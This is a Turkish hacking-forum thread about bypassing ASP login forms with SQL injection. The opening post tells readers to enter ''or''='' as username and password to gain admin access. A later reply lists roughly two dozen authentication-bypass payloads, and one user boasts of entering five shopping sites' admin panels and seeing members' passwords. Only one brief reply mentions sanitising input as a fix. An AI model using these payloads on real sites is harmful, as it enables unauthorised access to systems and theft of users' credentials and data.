folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder ’Or’’=’ (Çok Önemli Bir Açık.Admin Olursunuz Mazallah :-)



’Or’’=’ (Çok Önemli Bir Açık.Admin Olursunuz Mazallah :-)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek

     ’or’’=’         bunu login olurken nicke ve şifreye yazıyoruz.asp sitelerde onlem alınmamışsa admin oluyoruz.sitede direk admin giriş yeri veya login yoksa siteadı/admin.asp veya siteadı/login.asp den manuel olarak yapıyoruz.


    bazı lamerler onlem almadıgı için bu açıklla sonuca ulasmak mumkun

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    a4tech
    a4tech's avatar
    Kayıt Tarihi: 21/Temmuz/2005
    Erkek
    ohooooo abi sen geride kalmısın ya. bu acık 3 sene oncesinden vardı.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tarikat Şeyhi
    HolyOne
    HolyOne's avatar
    Kayıt Tarihi: 01/Haziran/2002
    Erkek

    SQL injection diyoruz biz ona


    aratirsan cok bulursun ondan


    Nush ile uslanmayanı etmeli tekdir, Tekdir ile uslanmayanın hakkı kötektir!
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MitNickKevin
    MitNickKevin's avatar
    Kayıt Tarihi: 09/Mart/2004
    Erkek
    Sabbotaj bunu yazdı:


    bazı lamerler onlem almadıgı için bu açıklla sonuca ulasmak mumkun


    yanlış yazmışsın doğrusu bu şekilde "Bazı coderler önlem almadığı için bu açıkla lamerlerin sonuç alması mümkündür."

    Bilgi ceza, Bilgi suç ve Taşımak ağır. Unutmak ise öğrenmekten daha çok zaman alır...
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rockipsiz
    rockipsiz's avatar
    Kayıt Tarihi: 21/Aralık/2002
    Erkek
    tahribat.com admin lock bile yiyodu zamanında eheueheuehue :) normalde sazanları almıyoruz ama buyrun girin die de bi yazı çıkardı sonra... bazı süper üstün hackerlerde tahribatı yardık sql injectionla die gezdi ortada.. eğlendiler öle kendi çaplarında ne günlerdi beeee

    Always with me, always with you...
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    CYB3R-SPY
    CYB3R-SPY's avatar
    Kayıt Tarihi: 28/Temmuz/2005
    Erkek

    " or "x"="x
    ’) or (’x’=’x
    ’ or 1=1--
    " or 1=1--
    or 1=1--
    ’ or a=a--
    " or "a"="a

    ’) or (’a’=’a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi’ or 1=1 --
    hi’ or ’a’=’a
    hi’) or (’a’=’a
    hi")or("a"="a

    admin’--
    ’ or 0=0 --
    " or 0=0 --
    or 0=0 --
    ’ or 0=0 #
    " or 0=0 #
    or 0=0 #
    ’ or ’x’=’x


    bu komutları da kullanabilrsin..


    ]Bâtıl şeyleri tasvir etmek, safi zihinleri idlâl eder
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    ben lamer derken safra anlamında soledim.biz sınıftada bile lamer dioz.ehuheheu
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    corvuscorax
    corvuscorax's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    vay beh herşeye lamer demek de ilginc be usta yani o kelimeyi fazla benimsememek gerek ileride sorun cıkabilir

    İnsanoğlunun içinde uyuyan güçler vardır. Kendisi bile şaşırır. Çünkü bu güçlere sahip olduğu aklından bile geçmez. Bu güçleri uyandırıp eyleme geçebilirse, o kişinin hayatında büyük bir devrim olurdu.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    xeren
    xeren's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek
    baba uc sene dionda ben daha dun 5 tane tassakli siteye admin paneline girdimm... hemide alisveris siteleri uyelerin sifreleri herseyi wardi neiseeee bakam
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    vampire
    vampire's avatar
    Kayıt Tarihi: 18/Eylül/2003
    Erkek
    bakın beyler bu açık ilk stniz forumda çıkmıştı o zamanlar her yerde yiyordu şimdidde yiyor salak olan kendini coder sananların sistemleri daha doğrusu başka scriptlerden editledikleri sistemlere böyle giriliyor vel hasılıkelam aspde karekterleri okutup temizletirsin olay biter fazla kasmaya gerek yok bu açık sql injection kategorsine girer ve nerdeyse ölmüş bir açıktır unionlar ve selectlerle uğraşmaya başlayın 
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tarikat Şeyhi
    HolyOne
    HolyOne's avatar
    Kayıt Tarihi: 01/Haziran/2002
    Erkek

    rockipsiz bunu yazdı:



    tahribat.com admin lock bile yiyodu zamanında eheueheuehue :) normalde sazanları almıyoruz ama buyrun girin die de bi yazı çıkardı sonra... bazı süper üstün hackerlerde tahribatı yardık sql injectionla die gezdi ortada.. eğlendiler öle kendi çaplarında ne günlerdi beeee


    Tahribat.com adminlock hicbi zaman 'or' yemedi:) geyik olsun diye sifrei 'or' yaptik, araya bosluk koyarak falan giremiodun ole cunku sifre 'or' du, sonradan baktik millet acik saniyo daha buyuk bi aciklama girdik.


    Nush ile uslanmayanı etmeli tekdir, Tekdir ile uslanmayanın hakkı kötektir!
Toplam Hit: 1960 Toplam Mesaj: 13